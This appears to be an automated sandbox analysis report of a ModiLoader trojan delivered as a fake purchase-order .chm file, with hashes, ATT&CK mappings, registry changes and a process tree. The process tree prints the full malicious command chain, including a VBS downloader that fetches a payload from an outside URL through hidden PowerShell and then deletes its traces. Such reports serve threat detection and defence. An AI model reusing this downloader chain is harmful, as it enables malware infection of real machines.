modiloader | 5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/01/2025, 10:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO_095709_0485685_MQ1940_Order_Specifications.chm
Size

75KB
MD5

98191ac03cddd697bed63b0eab761bed
SHA1

9ea831063cbdccf9de4b79e195800cac9d5518ad
SHA256

5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33
SHA512

7313ac3423e2e68e42c58a04b6b945b5b0e6ff1c8aea91fb145cca927d19b0be54b2cb174ef6a8434970b41ed539ce295da6b8246844ddbf3b5735a7b77f4a7d
SSDEEP

1536:pbN0IxCKVgZpisZ1MJ0cifP4R232WJniFPurASPDuP/V6McEJh:ZGIkgI1gNi44TJiFP8ASS8ML

Score

10^/10

modiloader defense_evasion discovery execution persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/1680-60-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-69-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-111-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-101-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-99-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-98-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-96-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-94-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-93-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-89-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-88-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-86-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-84-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-82-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-81-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-79-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-76-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-75-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-74-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-142-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-141-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-140-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-138-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-136-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-134-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-131-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-130-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-128-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-126-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-124-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-121-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-120-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-118-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-116-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-113-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-110-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-108-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-107-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-104-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-102-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-100-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-67-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-97-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-95-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-92-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-91-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-90-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-87-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-85-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-83-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-80-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-78-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-64-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-77-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-65-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-73-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-72-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-71-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-70-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-68-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2
behavioral1/memory/1680-66-0x0000000003440000-0x0000000004440000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
852	powershell.exe
2476	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2664	ript.exe
1680	x.exe
2568	svchost.pif
548	svchost.pif
2300	ezaitqoJ.pif

Loads dropped DLL 6 IoCs

pid	Process
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
1680	x.exe
1680	x.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Joqtiaze = "C:\\Users\\Public\\Joqtiaze.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2564	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
10	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1680 set thread context of 2300	1680	x.exe	49

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
844	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ript.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1680	x.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
852	powershell.exe
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	844	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2396	hh.exe
2396	hh.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2396 wrote to memory of 2564	2396	hh.exe	28
PID 2396 wrote to memory of 2564	2396	hh.exe	28
PID 2396 wrote to memory of 2564	2396	hh.exe	28
PID 2564 wrote to memory of 1036	2564	cmd.exe	30
PID 2564 wrote to memory of 1036	2564	cmd.exe	30
PID 2564 wrote to memory of 1036	2564	cmd.exe	30
PID 2564 wrote to memory of 852	2564	cmd.exe	31
PID 2564 wrote to memory of 852	2564	cmd.exe	31
PID 2564 wrote to memory of 852	2564	cmd.exe	31
PID 852 wrote to memory of 2664	852	powershell.exe	32
PID 852 wrote to memory of 2664	852	powershell.exe	32
PID 852 wrote to memory of 2664	852	powershell.exe	32
PID 2564 wrote to memory of 2476	2564	cmd.exe	34
PID 2564 wrote to memory of 2476	2564	cmd.exe	34
PID 2564 wrote to memory of 2476	2564	cmd.exe	34
PID 2476 wrote to memory of 2940	2476	powershell.exe	35
PID 2476 wrote to memory of 2940	2476	powershell.exe	35
PID 2476 wrote to memory of 2940	2476	powershell.exe	35
PID 2940 wrote to memory of 568	2940	cmd.exe	37
PID 2940 wrote to memory of 568	2940	cmd.exe	37
PID 2940 wrote to memory of 568	2940	cmd.exe	37
PID 2564 wrote to memory of 844	2564	cmd.exe	38
PID 2564 wrote to memory of 844	2564	cmd.exe	38
PID 2564 wrote to memory of 844	2564	cmd.exe	38
PID 2940 wrote to memory of 1680	2940	cmd.exe	39
PID 2940 wrote to memory of 1680	2940	cmd.exe	39
PID 2940 wrote to memory of 1680	2940	cmd.exe	39
PID 2940 wrote to memory of 1680	2940	cmd.exe	39
PID 1680 wrote to memory of 3028	1680	x.exe	43
PID 1680 wrote to memory of 3028	1680	x.exe	43
PID 1680 wrote to memory of 3028	1680	x.exe	43
PID 1680 wrote to memory of 3028	1680	x.exe	43
PID 1680 wrote to memory of 1544	1680	x.exe	45
PID 1680 wrote to memory of 1544	1680	x.exe	45
PID 1680 wrote to memory of 1544	1680	x.exe	45
PID 1680 wrote to memory of 1544	1680	x.exe	45
PID 1680 wrote to memory of 2300	1680	x.exe	49
PID 1680 wrote to memory of 2300	1680	x.exe	49
PID 1680 wrote to memory of 2300	1680	x.exe	49
PID 1680 wrote to memory of 2300	1680	x.exe	49
PID 1680 wrote to memory of 2300	1680	x.exe	49
PID 1680 wrote to memory of 2300	1680	x.exe	49

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\PO_095709_0485685_MQ1940_Order_Specifications.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:1036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:852
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2940
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:568
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:1680
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Public\JoqtiazeF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3028
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1544
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:2568
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:548
      - C:\Users\Public\Libraries\ezaitqoJ.pif
        
        C:\Users\Public\Libraries\ezaitqoJ.pif
        6⤵
        Executes dropped EXE
        
        PID:2300
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
988KB

MD5
def78c9fbba5b51a694c94bdd8b90b5c

SHA1
4c9878326b3964e6aeea86e16800d13a6da7da38

SHA256
27a56c231c128fe16361c024507fa1f085e388440233f55842f9a42b5576e71e

SHA512
9001f2ea1fa8200030078741573606e55f70a823476987481a66ff2c841ded80541b2a74d2eebc564443e3583d7cbae016009c76214970d0e4fe018da4d91e5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f555db58877ad2d36a2241fbe98a5d1e

SHA1
413574750b81d353de41a3e53a787afa6f7f7b44

SHA256
9b4b256f861a8eb990a2aa7f1a60d888382304f7b358ae13056453f9e08e3cc1

SHA512
c9209af52b7cbf8ce74b74fdfd8ee21a61a27da4cb816a345e1d3985eb99b2f21a30f1b0ebd3f0a904d23a02bdaecb6bfddf0a4617db81747ff9143f82b7460f

Download Submit
C:\Users\Public\JoqtiazeF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\df.cmd

Filesize
988KB

MD5
17e6e713ed88991dfadaa8f898f44f39

SHA1
ff4ae1fc81e3bf4c853f216aba29d6f1ee40aafe

SHA256
993cdeb22d286c12418aa42265112149f4499104fa61cee4f0f0fef2426ea69f

SHA512
a3db59c1ec2ec419791dca2140d2cae3c63c1080e133a43b43e5f47c673c1a255b12f71c8e62a9f47026a985f8b1727d18fcf064d70e4605d279a99d98672bf5

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
\Users\Public\Libraries\ezaitqoJ.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
\Users\Public\ript.exe

Filesize
152KB

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
memory/852-25-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/852-26-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/1680-124-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-110-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-99-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-98-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-96-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-94-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-93-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-89-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-88-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-86-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-84-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-82-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-81-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-79-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-76-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-75-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-74-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-142-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-141-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-140-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-138-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-136-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-134-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-131-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-130-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-128-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-126-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-111-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-121-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-120-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-118-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-116-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-113-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-101-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-108-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-107-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-104-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-102-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-100-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
memory/1680-67-0x0000000003440000-0x0000000004440000-memory.dmp

Filesize
16.0MB

Download
